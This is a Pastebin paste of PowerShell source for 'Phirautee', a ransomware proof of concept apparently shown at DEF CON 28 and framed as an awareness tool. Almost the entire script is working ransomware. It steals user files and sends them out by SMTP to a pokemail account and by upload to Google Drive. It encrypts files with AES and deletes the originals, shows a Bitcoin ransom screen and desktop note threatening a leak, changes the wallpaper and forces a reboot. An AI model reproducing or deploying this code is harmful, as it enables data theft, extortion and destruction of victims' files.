FlyFar

Phirautee - A proof of concept crypto virus to spread user awareness - Source Code

Jun 26th, 2023
145
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PowerShell 18.93 KB | Cybersecurity | 0 0
  1. <#
  2.  
  3.                  _____
  4.               .-" .-. "-.
  5.             _/ '=(0.0)=' \_
  6.           /`   .='|m|'=.   `\   Author:Viral Maniar
  7.           \________________ /   Twiiter: @ManiarViral
  8.       .--.__///`'-,__~\\\\~`    ┌─┐┬ ┬┬┬─┐┌─┐┬ ┬┌┬┐┌─┐┌─┐
  9.      / /6|__\// a (__)-\\\\ ├─┘├─┤│├┬┘├─┤│ │ │ ├┤ ├┤
  10.      \ \/--`((   ._\   ,))) ┴  ┴ ┴┴┴└─┴ ┴└─┘ ┴ └─┘└─┘
  11.      /  \\  ))\  -==-  (O)(
  12.     /    )\((((\   .  /)))))
  13.    /  _.' /  __(`~~~~`)__
  14.   //"\\,-'-"`   `~~~~\\~~`"-.
  15.  //  /`"              `      `\
  16. //
  17. #>
  18. # RSA 3072 bits RSA Key
  19. #----------------------------------------------------------------------------------------------------------------------------------------
  20. # Generate Certificate & Export it to the Temp folder
  21. #----------------------------------------------------------------------------------------------------------------------------------------
  22.  
  23. $YOUR_NAME = "DEFCON 28 DEMO 2020"
  24.    
  25. $cert = New-SelfSignedCertificate -DnsName $YOUR_NAME -CertStoreLocation "Cert:\CurrentUser\My" -KeyLength 2048 -HashAlgorithm "Sha384" -NotBefore ((Get-Date).AddDays(-1)) -NotAfter (Get-Date -Year 2099 -Month 12 -Day 31) -Type DocumentEncryptionCert -KeyUsage KeyEncipherment, DataEncipherment
  26.  
  27. Export-Certificate -Cert $cert -FilePath "C:\temp\cert.cer" | Out-Null
  28.  
  29. #----------------------------------------------------------------------------------------------------------------------------------------
  30. # Base64 encoding the certificate by reading it from the temp folder
  31. #----------------------------------------------------------------------------------------------------------------------------------------
  32. $encodedcert = [Convert]::ToBase64String([IO.File]::ReadAllBytes("C:\temp\cert.cer"))
  33.  
  34. Write-Host "Base64 encoded certificate: $encodedcert" -ForegroundColor Green
  35.  
  36. #----------------------------------------------------------------------------------------------------------------------------------------
  37. # Password generator for the "DEFCON 28 DEMO 2020" Certificate
  38. #----------------------------------------------------------------------------------------------------------------------------------------
  39. [Reflection.Assembly]::LoadWithPartialName("System.Web")
  40. $pwd = [system.web.security.membership]::GeneratePassword(30,15)
  41.  
  42. echo ("$pwd") > c:/temp/sys.txt
  43. Start-Sleep -s 1
  44. Install-Module -Name 7Zip4Powershell -RequiredVersion 1.12.0  -Scope CurrentUser -AllowClobber -Force
  45. Start-Sleep -s 10
  46. $IV11 = "v9(nnlZl8rz:d)mok*D=+;Th[:}LN;P5C{Dp64|-AX5U"
  47. Write-Host "[+] Zipping files!" -ForegroundColor Green
  48. Compress-7Zip -Path c:\temp\sys.txt -ArchiveFileName c:\temp\backup.zip -Format Zip -Password "$IV11"
  49. Write-Host "[+] File zipped!" -ForegroundColor Green
  50.  
  51. #----------------------------------------------------------------------------------------------------------------------------------------
  52. # Send certificate password via encrypted zip file to Pokemail e-mail
  53. #----------------------------------------------------------------------------------------------------------------------------------------
  54. $email = "xxxxxxxx@pokemail.net" # Replace $email with your pokemail address
  55. $ZipFolder = "c:\temp\backup.zip"
  56. $SMTPServer = "smtp.pokemail.net"
  57. $Mailer = new-object Net.Mail.SMTPclient($SMTPServer)
  58. $From = $email
  59. $To = $email
  60. $Subject = "$env:USERNAME - $env:computername - Content $(get-date -f yyyy-MM-dd)"
  61. $Body = "Zip Attached"
  62. $Msg = new-object Net.Mail.MailMessage($From,$To,$Subject,$Body)
  63. $Msg.IsBodyHTML = $False
  64. $Attachment = new-object Net.Mail.Attachment($ZipFolder)
  65. $Msg.attachments.add($Attachment)
  66. $Mailer.send($Msg)
  67. $Attachment.Dispose()
  68. $Msg.Dispose()
  69. $Mailer.Dispose()
  70.  
  71. Write-Host "[+] Email Sent!" -ForegroundColor Green
  72. Start-Sleep -s 2
  73. Write-Host "[-] Deleting files" -ForegroundColor Red
  74. Remove-Item c:\temp\sys.txt
  75. Remove-Item c:\temp\backup.zip
  76.  
  77. #----------------------------------------------------------------------------------------------------------------------------------------
  78. # Password generator for the zip encrypted stolen files
  79. #----------------------------------------------------------------------------------------------------------------------------------------
  80.  
  81. $pwd1 = [system.web.security.membership]::GeneratePassword(30,15)
  82. echo ("$pwd1") > c:/temp/sys1.txt
  83. $IV1 = "D^Z@e8507=>YS#)qj;zgBeZWb!0-Tp(hBEAi:2.S5G/"
  84. Write-Host "[+] Zipping files!" -ForegroundColor Green
  85. Compress-7Zip -Path c:\temp\sys1.txt -ArchiveFileName c:\temp\backup1.zip -Format Zip -Password "$IV1"
  86. Write-Host "[+] File zipped!" -ForegroundColor Green
  87.  
  88. #----------------------------------------------------------------------------------------------------------------------------------------
  89. #Send password for files to your e-mail
  90. #----------------------------------------------------------------------------------------------------------------------------------------
  91. $email1 = "xxxxxxxxxxxxxxxxx@pokemail.net" # Replace $email1 with your pokemail address
  92. $ZipFolder1 = "c:\temp\backup1.zip"
  93. $SMTPServer = "smtp.pokemail.net"
  94. $Mailer = new-object Net.Mail.SMTPclient($SMTPServer)
  95. $From = $email1
  96. $To = $email1
  97. $Subject = "$env:USERNAME - $env:computername - Content $(get-date -f yyyy-MM-dd)"
  98. $Body = "Zip Attached"
  99. $Msg = new-object Net.Mail.MailMessage($From,$To,$Subject,$Body)
  100. $Msg.IsBodyHTML = $False
  101. $Attachment = new-object Net.Mail.Attachment($ZipFolder1)
  102. $Msg.attachments.add($Attachment)
  103. $Mailer.send($Msg)
  104. $Attachment.Dispose()
  105. $Msg.Dispose()
  106. $Mailer.Dispose()
  107.  
  108. Write-Host "[+] Email Sent!" -ForegroundColor Green
  109. Start-Sleep -s 2
  110. Write-Host "[-] Deleting files" -ForegroundColor Red
  111. Remove-Item c:\temp\sys1.txt
  112. Remove-Item c:\temp\backup1.zip
  113.  
  114. #----------------------------------------------------------------------------------------------------------------------------------------
  115. #Files to steal?
  116. #----------------------------------------------------------------------------------------------------------------------------------------
  117. $Source = "c:\tools\"    # Replace $source with the files and folder you want to encrypt. For the PoC try encrypt small size files to save time.
  118. $Destination = "c:\tools1\"
  119.  
  120. If (Test-Path -Path $Destination -PathType Container)
  121. { Write-Host "$Destination already exists" -ForegroundColor Red}
  122. ELSE
  123. { New-Item -Path $Destination -ItemType directory }
  124.  
  125. #$cp = robocopy /mov $Source $Destination *.txt /s
  126. $cp = robocopy /E $Source $Destination
  127. Start-Sleep -s 5
  128.  
  129. $files = Get-ChildItem -Path $Destination
  130.  
  131. For($i = 1; $i -le $files.count; $i++)
  132.  
  133. { Write-Progress -Activity "“Collecting files” -status “Finding file $i”" -percentComplete ($i / $files.count*100)}
  134.  
  135. $files | Select name
  136. Write-Host "[+] Files copied" -ForegroundColor Green
  137. Compress-7Zip -Path $Destination -ArchiveFileName c:\temp\steal.zip -Format Zip -Password "$pwd1"
  138.  
  139. Start-Sleep -s 5
  140. Write-Host "[+] Files zipped" -ForegroundColor Green
  141. #$del = Remove-Item $Destination -Force -Recurse
  142. Write-Host "[+] Uploading Large Files to G-Drive" -ForegroundColor Green
  143. Start-Sleep -s 5
  144. $del = Remove-Item $Destination -Force -Recurse
  145. Write-Host "[-] Uploading Large Files Deleted" -ForegroundColor Red
  146. #----------------------------------------------------------------------------------------------------------------------------------------
  147. #Encrypted Large files to be send to G-Drive
  148. #----------------------------------------------------------------------------------------------------------------------------------------
  149. # Set source and destination of files to copy and store
  150. # Set the Google Auth parameters. Fill in your RefreshToken, ClientID, and ClientSecret
  151. $params = @{
  152.     Uri = 'https://accounts.google.com/o/oauth2/token'
  153.     Body = @(
  154.         "refresh_token=XXXXXX-XXXXX-XXXXXXX-", # Replace $RefreshToken with your refresh token
  155.         "client_id=123XXXXXXX.XXXXXXXXXXXXXX.apps.googleusercontent.com",         # Replace $ClientID with your client ID
  156.         "client_secret=XXXXXXXXXXXXXXXXXXXXX", # Replace $ClientSecret with your client secret
  157.         "grant_type=refresh_token"
  158.     ) -join '&'
  159.     Method = 'Post'
  160.     ContentType = 'application/x-www-form-urlencoded'
  161. }
  162. $accessToken = (Invoke-RestMethod @params).access_token
  163.  
  164. # Change this to the file you want to upload
  165. $SourceFile = 'c:\temp\steal.zip'
  166.  
  167. # Get the source file contents and details, encode in base64
  168. $sourceItem = Get-Item $sourceFile
  169. $sourceBase64 = [Convert]::ToBase64String([IO.File]::ReadAllBytes($sourceItem.FullName))
  170. $sourceMime = [System.Web.MimeMapping]::GetMimeMapping($sourceItem.FullName)
  171.  
  172. # If uploading to a Team Drive, set this to 'true'
  173. $supportsTeamDrives = 'false'
  174.  
  175. # Set the file metadata
  176. $uploadMetadata = @{
  177.     originalFilename = $sourceItem.Name
  178.     name = $sourceItem.Name
  179.     description = $sourceItem.VersionInfo.FileDescription
  180.     #parents = @('teamDriveid or folderId') # Include to upload to a specific folder
  181.     #teamDriveId = ‘teamDriveId’            # Include to upload to a specific teamdrive
  182. }
  183.  
  184. # Set the upload body
  185. $uploadBody = @"
  186. --boundary
  187. Content-Type: application/json; charset=UTF-8
  188.  
  189. $($uploadMetadata | ConvertTo-Json)
  190.  
  191. --boundary
  192. Content-Transfer-Encoding: base64
  193. Content-Type: $sourceMime
  194.  
  195. $sourceBase64
  196. --boundary--
  197. "@
  198.  
  199. # Set the upload headers
  200. $uploadHeaders = @{
  201.     "Authorization" = "Bearer $accessToken"
  202.     "Content-Type" = 'multipart/related; boundary=boundary'
  203.     "Content-Length" = $uploadBody.Length
  204. }
  205.  
  206. # Perform the upload
  207. $response = Invoke-RestMethod -Uri "https://www.googleapis.com/upload/drive/v3/files?uploadType=multipart&supportsTeamDrives=$supportsTeamDrives" -Method Post -Headers $uploadHeaders -Body $uploadBody
  208.  
  209. #$Source = "C:\Users\$env:USERNAME\Desktop\Important"
  210. #$Source = "C:\temp"
  211. #$Destination = "C:\Users\$env:USERNAME\Desktop\StolenFiles"
  212. Start-Sleep -s 10
  213. Remove-Item c:\temp\steal.zip
  214. Start-Sleep -s 5
  215. Write-Host "[-] Stolen file deleted from the host..." -ForegroundColor Red
  216. Write-Host "[+] Init Phiratee..." -ForegroundColor Green
  217. #----------------------------------------------------------------------------------------------------------------------------------------
  218. #Encrypt files via Phirautee
  219. #----------------------------------------------------------------------------------------------------------------------------------------
  220. Function Encr{param([string]$i,[string]$p)
  221.   process{
  222.     [System.Security.Cryptography.AesCryptoServiceProvider]$a=[System.Security.Cryptography.AesCryptoServiceProvider]::new()
  223.     $a.BlockSize=128
  224.     $a.KeySize=256
  225.     $a.Mode=[System.Security.Cryptography.CipherMode]::CBC
  226.     $a.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7
  227.     $a.GenerateIV();[byte[]]$IV=$a.IV;[byte[]]$k=[system.Text.Encoding]::UTF8.GetBytes($pwd)
  228.     [System.IO.FileStream]$fout=[System.IO.FileStream]::new($i+".phirautee",[System.IO.FileMode]::Create)
  229.     [System.Security.Cryptography.ICryptoTransform]$IC=$a.CreateEncryptor($k,$IV)
  230.     [System.Security.Cryptography.CryptoStream]$CS=[System.Security.Cryptography.CryptoStream]::new($fout, $IC, [System.Security.Cryptography.CryptoStreamMode]::Write)
  231.     [System.IO.FileStream]$fin=[System.IO.FileStream]::new($i,[System.IO.FileMode]::Open)
  232.     $fout.Write($IV,0,$IV.Count)
  233.     $DA=$true;[int]$D
  234.     While ($DA){
  235.       $D=$fin.ReadByte()
  236.       if($D -ne -1){
  237.         $CS.WriteByte([byte]$D)
  238.       }
  239.       else{
  240.         $DA = $false
  241.       }
  242.     }
  243.     $fin.Dispose();
  244.     $CS.Dispose();
  245.     $fout.Dispose()
  246.   }
  247. }
  248.  
  249. #foreach ($i in $(Get-ChildItem C:/temp/ -recurse -include *.txt | ForEach-Object { $_.FullName })){
  250. # Replace C:\tools with the folder you want to encrypt. Also you can add or modify the file types by comma seperated - *.txt, *.jpg, *.png etc.
  251. foreach ($i in $(Get-ChildItem C:\tools -recurse -include *.txt  | ForEach-Object { $_.FullName })){
  252.   Encr -i $i -p $pwd
  253.   rm $i
  254. }
  255.  
  256. $alert = "https://raw.githubusercontent.com/Viralmaniar/Phirautee/master/defcon.jpg"
  257. Invoke-WebRequest -Uri $alert -OutFile "C:/temp/defcon.jpg"
  258. Start-Sleep -s 2
  259.  
  260. Write-Host "[+] Phiratee Deployed Successfully..." -ForegroundColor Green
  261. $encodedcert =  [IO.File]::WriteAllBytes("/windows/temp/x.cer", [Convert]::FromBase64String($encodedcert))
  262. #echo (Protect-CmsMessage -Content $pwd -To "/windows/temp/x.cer") > /users/$env:USERNAME/desktop/encrypted_key.txt
  263.  
  264. Start-Sleep -s 10
  265. #remove-variable pwd
  266. Write-Host "[+] Intiating UI..." -ForegroundColor Green
  267. [void] [System.Reflection.Assembly]::LoadWithPartialName("System.Drawing")  
  268. [void] [System.Reflection.Assembly]::LoadWithPartialName("System.Windows.Forms")
  269. [void] [System.Windows.Forms.Application]::EnableVisualStyles()
  270.  
  271. function EncryptedFiles
  272. {
  273. $Source = "c:\tools\" # replace the path with the folders you encrypted
  274. explorer $Source
  275. }
  276.  
  277. function RandomBacklight {
  278. $random = New-Object System.Random
  279. switch ($random.Next(9)) {
  280.     0 {$Form.BackColor = "LightBlue"}
  281.     1 {$Form.BackColor = "LightGreen"}
  282.     2 {$Form.BackColor = "LightPink"}
  283.     3 {$Form.BackColor = "Yellow"}
  284.     4 {$Form.BackColor = "Orange"}
  285.     5 {$Form.BackColor = "Brown"}
  286.     6 {$Form.BackColor = "Magenta"}
  287.     7 {$Form.BackColor = "White"}
  288.     8 {$Form.BackColor = "Gray"}
  289. }
  290. }
  291.  
  292. $Form = New-Object system.Windows.Forms.Form
  293. $Form.Size = New-Object System.Drawing.Size(960,900)
  294. #You can use the below method as well
  295. #$Form.Width = 400
  296. #$Form.Height = 200
  297. $Form.Add_Click({RandomBacklight})
  298. $form.MaximizeBox = $false
  299. $Form.Back
  300. $Form.StartPosition = "CenterScreen"
  301. $Form.FormBorderStyle = 'Fixed3D'
  302. $Form.Text = "Phiarutee - DEF CON 2020 Demo"
  303.  
  304. $img = [System.Drawing.Image]::Fromfile('c:\temp\defcon.jpg')
  305. $pictureBox = new-object Windows.Forms.PictureBox
  306. $pictureBox.Width = $img.Size.Width
  307. $pictureBox.Height = $img.Size.Height
  308. $pictureBox.Image = $img
  309. $form.controls.add($pictureBox)
  310.  
  311. $Label = New-Object System.Windows.Forms.Label
  312. $Label.ForeColor = "Red"
  313. $Label.Text = "--You Got Ransomed-- !!! ++ DO NOT TURN-OFF YOUR COMPUTER ++ !!! "
  314. $Label.AutoSize = $true
  315. $Label.Location = New-Object System.Drawing.Size(50,450)
  316. $Font = New-Object System.Drawing.Font("Arial",15,[System.Drawing.FontStyle]::Bold)
  317. $form.Font = $Font
  318. $Form.Controls.Add($Label)
  319.  
  320. #$formIcon = New-Object system.drawing.icon ("$env:USERPROFILE\desktop\Blog\v.ico")
  321. #$form.Icon = $formicon
  322.  
  323. $Okbutton = New-Object System.Windows.Forms.Button
  324. $Okbutton.Location = New-Object System.Drawing.Size(50,500)
  325. $Okbutton.Size = New-Object System.Drawing.Size(450,30)
  326. $Okbutton.Text = "View Encrypted Files with Phiarutee"
  327. $Okbutton.Add_Click({EncryptedFiles})
  328. $Form.Controls.Add($Okbutton)
  329.  
  330. $btc_addr = '1HF16jtnSCuRvAThJ7p99QeroAnBkiR4Yb'      # Replace this with your address
  331. $Label1 = New-Object System.Windows.Forms.Label
  332. $Label1.Text = "Send 0.10 BTC to this account: $btc_addr"
  333. $Label1.AutoSize = $true
  334. $Label1.Location = New-Object System.Drawing.Size(50,550)
  335. $Font1 = New-Object System.Drawing.Font("Arial",15,[System.Drawing.FontStyle]::Bold)
  336. $form.Font = $Font1
  337. $Form.Controls.Add($Label1)
  338.  
  339. $objTextBox1 = New-Object System.Windows.Forms.TextBox
  340. $objTextBox1.Multiline = $True;
  341. $objTextBox1.Text = "We have encrypted your important files. For now you cannot access these files. Encrypted files have been modified with an extension ""phirautee"". It is possible to recover your files but you need to follow our instructions and pay us before the time runs out. If you do not pay the ransom of 0.10 BTC these files will be leaked online. The faster you contact us at XXXX@XXXXXXXX.XXX with the proof of payment, the easier it will be for us to release your files. Your backups were also encrypted and removed. Please read Phirautee.txt file on the desktop for further information."
  342. $objTextBox1.AutoSize = $true
  343. $objTextBox1.Location = New-Object System.Drawing.Size(50,650)
  344. $objTextBox1.Size = New-Object System.Drawing.Size(850,180)
  345. $Font2 = New-Object System.Drawing.Font("Arial",15,[System.Drawing.FontStyle]::Bold)
  346. $objTextBox1.Scrollbars = "Vertical"
  347. $form.Font = $Font2
  348. $Form.Controls.Add($objTextBox1)
  349.  
  350. $delay = 30
  351.  
  352. $Counter_Label = New-Object System.Windows.Forms.Label
  353. $Counter_Label.Location = New-Object System.Drawing.Size(50,600)
  354. $Counter_Label.AutoSize = $true
  355. $Counter_Label.ForeColor = "Green"
  356. $Form.Controls.Add($Counter_Label)
  357.  
  358. while ($delay -ge 0)
  359. {
  360.     $Form.Show()
  361.     $Counter_Label.Text = "Seconds Remaining: $($delay)"
  362.     if ($delay -lt 5)
  363.       {
  364.          $Counter_Label.ForeColor = "Red"
  365.          $fontsize = 20-$delay
  366.          $warningfont = New-Object System.Drawing.Font("Times New Roman",$fontsize,[System.Drawing.FontStyle]([System.Drawing.FontStyle]::Bold -bor [System.Drawing.FontStyle]))
  367.          $Counter_Label.Font = $warningfont
  368.       }
  369. start-sleep 1
  370. $delay -= 1  
  371. }
  372. $Form.Close()
  373. $background = "https://raw.githubusercontent.com/Viralmaniar/Phirautee/master/PhirauteeBackground-3.jpg"
  374. Invoke-WebRequest -Uri $background -OutFile "/users/$env:USERNAME/PhirauteeBackground-3.jpg"
  375. Start-Sleep -s 2
  376. <#
  377. #Set-ItemProperty -path 'HKCU:\Control Panel\Desktop\' -name WallPaper -value ''
  378. New-ItemProperty -Path "HKCU:\Control Panel\Personalization" -Name "DesktopImageStatus" -Value "1" -PropertyType DWORD -Force | Out-Null
  379. New-ItemProperty -Path "HKCU:\Control Panel\Personalization"-Name "DesktopImagePath" -Value "/users/$env:USERNAME/PhirauteeBackground-3.jpg" -PropertyType STRING -Force | Out-Null
  380. New-ItemProperty -Path "HKCU:\Control Panel\Personalization" -Name "DesktopImageUrl" -Value "/users/$env:USERNAME/PhirauteeBackground-3.jpg" -PropertyType STRING -Force | Out-Null
  381. #>
  382. $wallpaper = "C:/users/$env:USERNAME/PhirauteeBackground-3.jpg"
  383. Set-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name Wallpaper -value "$wallpaper"
  384. Set-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name WallpaperStyle -value "10"
  385. Start-Sleep -s 2
  386. rundll32.exe user32.dll, UpdatePerUserSystemParameters, 1 , $False
  387.  
  388. Stop-Process -ProcessName explorer
  389.  
  390. echo "We have encrypted your important files. For now, you cannot access these files. Encrypted files have been modified with an extension ""phirautee"". It is possible to recover your files but you need to follow our instructions and pay us before the time runs out. If you do not pay the ransom of 0.10 BTC these files will be leaked online. The faster you contact us at XXXX@XXXXXXXX.XXX with the proof of payment, the easier it will be for us to release your files. Your backups were also encrypted and removed. Please read Phirautee.txt file on the desktop for further information. This ransomware encrypts all the files of the hard drive. To decrypt the files please send us the proof of the transfer. Do not try to modify the files extension or else it will destroy the data. If you do not pay the money your sensitive data will be leaked online." > /users/$env:USERNAME/desktop/Phirautee.txt
  391. #$Form.ShowDialog()
  392. #$Form.Focus()
  393. Get-ChildItem -Path Cert:\CurrentUser\My | where { $_.subject -eq "CN=DEFCON 28 DEMO 2020" } | Remove-Item
  394.  
  395. start-sleep 2
  396.  
  397. Remove-Item c:\windows\temp\x.cer
  398.  
  399. start-sleep 1
  400.  
  401. Remove-Item C:\temp\cert.cer
  402.  
  403. restart-computer -force
Add Comment
Please, Sign In to add comment